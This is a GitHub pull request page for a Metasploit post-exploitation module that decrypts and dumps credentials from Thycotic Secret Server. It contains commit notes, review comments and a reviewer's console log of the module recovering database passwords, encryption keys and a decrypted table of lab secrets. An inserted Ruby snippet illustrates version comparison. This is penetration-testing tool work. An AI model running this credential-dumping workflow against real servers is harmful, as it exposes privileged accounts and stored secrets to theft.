Add thycotic_secretserver_dump post module #16933

Merged (11 commits), Sep 30, 2022

Conversation

npm-cesium137-io
Contributor

Initial commit for post module targeting Windows servers with Secret Server installed. Very potent if you manage to bag a vulnerable target! This should work against SS 10.4 through 11.2 but has only been tested against 11.2.

Initial commit for post module targeting Windows servers with Secret
Server installed.
The module can decrypt secrets from Secret Server version 10.4 - 11.2
provided they are not protected by HSM.
An additional auxiliary module is being developed to perform offline
decryption and recovery of the database using the loot extracted via
this module.
@npm-cesium137-io
Contributor Author

I can make an unlicensed installer for SS 11.2 available for testing and validation if need be. Without a license only one user (the built-in admin account) is allowed, and advanced features like replication are disabled, but none of those things should impact this module.

Contributor

@jmartin-tech jmartin-tech left a comment


Loot clarification changes are required; some other comments are recommendations or ideas for improvement.

One optional idea I will offer: a check method that evaluates the environment to confirm secretserver is installed and the required resources are accessible might be better served to consolidate many of the fail_with(Msf::Exploit::Failure::NoTarget... conditions.

@npm-cesium137-io
Contributor Author

Hi, thanks for all the great feedback - I'm excited to report that I have recently been gifted installers for Secret Server 8.4 through 11.2, and have made a ton of improvements, fixes, and additional support based on some lab time with various builds. I will hopefully be making a commit soon that includes these changes as well as the revisions suggested here. Watch this space!

Re-worked version detection code after working with earlier builds of
Secret Server.

Removed the LastModifiedDate time stamp from the SQL query as it was not
available in any but late versions.

Added logic for dealing with SQL schema differences between versions.

Added support for earlier builds of Secret Server, including pre-10.4
instances, which use different encryption mechanisms.

Significant refactor of several methods to support legacy versions of
Secret Server.

Re-designed the workflow: module now has three actions, "export" dumps
the encrypted CSV, "decrypt" will decrypt an exported CSV and "dump"
(default) does both.

Various bug-fixes and tweaks based on feedback.

Changed some of the wording of output messages.
@npm-cesium137-io
Contributor Author

Just pushed a commit that has a bunch of changes plus new functional support.

Added much-needed support for SQL integrated authentication.

Significant improvement to the decryption routine: better version
detection and less churning through faulty decryption attempts.

Various tweaks and optimizations based on feedback.

Lots of bug fixes.
Added support for sessionless execution if the SESSION is set to -1.

Misc cleanup.
Removed all logic around the isSalted column since I have no idea what
that flag is actually supposed to represent.

Further optimized Thycotic decryption method for efficiency.

Fixed where the revision digit was being truncated after converting
ss_build to float.

Removed the offline 'decrypt' action as it required setting a reserved
value for session in order to operate.

Minor tweaks; corrected typos and formatting.

Updated documentation.
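The commit above notes that the revision digit was being truncated after converting ss_build to float. The snippet below, an added example that is not code from this PR or from the Metasploit module, shows that pitfall next to a tuple-based comparison. The build strings are constructed samples, the helper names (build_to_float, build_version, pre_10_4?, newer_build?) are assumptions, and the 10.4 threshold is the one the commit messages cite for the change in encryption mechanism.

```ruby
require "rubygems" # Gem::Version ships with Ruby; explicit require for clarity

# The pitfall: String#to_f stops parsing at the second dot, so for a
# "major.minor.revision" build string the revision component is silently lost.
def build_to_float(ss_build)
  ss_build.to_f
end

# The fix: treat the build as a version tuple. Gem::Version splits on dots and
# compares numeric segments as integers, so "10.4.000001" sorts above "10.4".
def build_version(ss_build)
  Gem::Version.new(ss_build)
end

# True when build `a` is strictly newer than build `b`.
def newer_build?(a, b)
  build_version(a) > build_version(b)
end

# True when the build predates 10.4 (the version the commit messages name as the
# boundary between the legacy and current encryption mechanisms). Hypothetical
# helper; only the threshold comes from the page.
def pre_10_4?(ss_build)
  build_version(ss_build) < Gem::Version.new("10.4")
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample builds, not real Secret Server release numbers.
  sample_a = "10.4.000001"
  sample_b = "10.4"
  puts "to_f collapses both to #{build_to_float(sample_a)} / #{build_to_float(sample_b)}"
  puts "tuple comparison: #{sample_a} newer than #{sample_b}? #{newer_build?(sample_a, sample_b)}"
  puts "pre-10.4 build 10.3.000015? #{pre_10_4?('10.3.000015')}"
  puts "pre-10.4 build 11.22? #{pre_10_4?('11.22')}"
end
```

The truncation only shows up once a build string carries a third component, which is why a two-part build like 11.22 compares correctly as a float and the bug goes unnoticed until an older three-part build is encountered.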
@npm-cesium137-io
Contributor Author

Just committed updates to the module and documentation; this should be close to shipshape. Let me know if anything merits further tweaking.

Significant refactor of exception handling: less 'fail_with', more
'return false'.

Optimized interactions with SQL for less code redundancy.

Removed references to LOOT_ONLY in the module info.

Various tweaks and bug fixes.
@jharris-r7 jharris-r7 assigned jharris-r7 and unassigned jharris-r7 Sep 13, 2022
@jheysel-r7 jheysel-r7 self-assigned this Sep 28, 2022
Contributor

@jheysel-r7 jheysel-r7 left a comment


@npm-cesium137-io, thank you so much for the well written module, and for making the changes previously suggested.

I was able to set up Secret Server 11.2 and tested the successful decryption of multiple different kinds of secrets stored on the server 👌

Everything looks good to me. I usually don't commit my own suggestions but in this case they're just typo fixes so I'm going to get those in and land.

msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > set session 2
session => 2
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > run

[*] Hostname WIN-2EEL7BRDUD8 IPv4 172.16.199.132
[*] Decrypt database.config ...
[+] Secret Server SQL Database Connection Configuration:
[+] 	Instance Name: localhost\SQLEXPRESS
[+] 	Database Name: SecretServer
[+] 	Database User: sa
[+] 	Database Pass: lI8-.y1^qHM!C18f4-t865a^r6hWim8Nl2U
[*] Secret Server Build 11.22
[*] Decrypt encryption.config ...
[+] Secret Server Encryption Configuration:
[+] 	   KEY: 6f59ccbd1ef3490a35099f8287d2704c
[+] 	KEY256: e4aff609f94fbda6556cc058647d3bdb351fc9bb447c0cb03a4d6b4fdac419d2
[+] 	    IV: 5132b8cd4ac3aa1dbe0217fe30500b74
[*] Performing export of Secret Server SQL database to CSV file
[*] Export Secret Server DB ...
[+] 29 rows exported, 5 unique SecretIDs
[+] Encrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_234339.txt
[*] Performing decryption of Secret Server SQL database
[+] 29 rows loaded, 5 unique SecretIDs
[*] Process Secret Server DB ...
[+] 29 rows processed
[*] 15 rows recovered: 0 plaintext, 15 decrypted (14 blank)
[*] 15 rows written (14 blank rows withheld)
[+] 5 unique SecretID records recovered
[+] Decrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] exec: cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt

SecretID,Active,SecretType,SecretName,FieldName,Plaintext,Plaintext2
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Machine,test,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Username,Shhh_its_a_secret,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Password,Shhh_its_a_secret,NULL
2,1,Active Directory Account,AD_account_secret,Domain,example.test.com,NULL
2,1,Active Directory Account,AD_account_secret,Username,msfuser,NULL
2,1,Active Directory Account,AD_account_secret,Password,N0tpassword@,NULL
3,1,Bank Account,I_have_lots_of_money,BankAccountNumber,1234123412341234,NULL
3,1,Bank Account,I_have_lots_of_money,TransitRoutingNumber,12341234,NULL
3,1,Bank Account,I_have_lots_of_money,NameOfBank,Cash_Money_Bank,NULL
4,1,MySql Account,SQL_secret,Server,sql_server,NULL
4,1,MySql Account,SQL_secret,Username,sa,NULL
4,1,MySql Account,SQL_secret,Password,SuperR00tP@ssword,NULL
5,1,z/OS Mainframe,MainFrameSecret,Machine,MainFrame,NULL
5,1,z/OS Mainframe,MainFrameSecret,Username,Hacker,NULL
5,1,z/OS Mainframe,MainFrameSecret,Password,youvebeenHACKED123!@#,NULL
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > options

@jheysel-r7 jheysel-r7 merged commit 9ad513d into rapid7:master Sep 30, 2022
@jheysel-r7
Contributor

Release Notes

This PR adds a post exploitation module that exports and decrypts Thycotic Secret Server credentials

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 30, 2022